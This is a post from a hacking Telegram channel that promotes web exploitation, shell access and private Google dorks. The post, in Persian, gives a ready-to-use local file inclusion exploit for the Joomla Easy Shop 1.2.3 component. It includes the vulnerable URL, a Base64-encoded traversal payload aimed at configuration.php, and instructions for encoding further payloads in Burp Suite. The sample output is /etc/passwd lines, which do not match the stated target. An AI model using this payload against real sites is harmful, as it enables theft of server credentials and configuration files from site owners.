0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.23K photos
123 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
💠🌐🌀
🔰⚜️
💢
#Joomla (Joomla!) #Component #EasyShop (Easy Shop) v 1.2.3 #LFI Local File Inclusion #Vulnerable

آسیب پذیری LFI در کامپوننته Easy Shop جوملا :
#~Exploit Title :
Joomla! Component Easy Shop 1.2.3 - Local File Inclusion

#~Path :
آدرسی باگ :
http://localhost/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=‍‍‍

#~Exploit :
نحوه ی اکسپلویت :
== > برای اینکه اکسپلویت اجرا بشه باید دستورات رو بصورت کاراکتر های Base64 انکود کنید و به اخر url اضافه کنید
مانند :
‍`/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=`

اگر قسمت انکود شده را دیکود کنیم برابر با عبارت زیر میشود :
../../configuration.php

بخشی از پاسخی که سایت برای ما برمیگردونه :
‍`root:x:0:0:root:/root:/bin/bash`
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin

برای اینکه بتوانید دستورات خودتون را انکود کنید بهترین راه استفاده از BurpSuite است.(در تب Decoder )

Software Link

⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's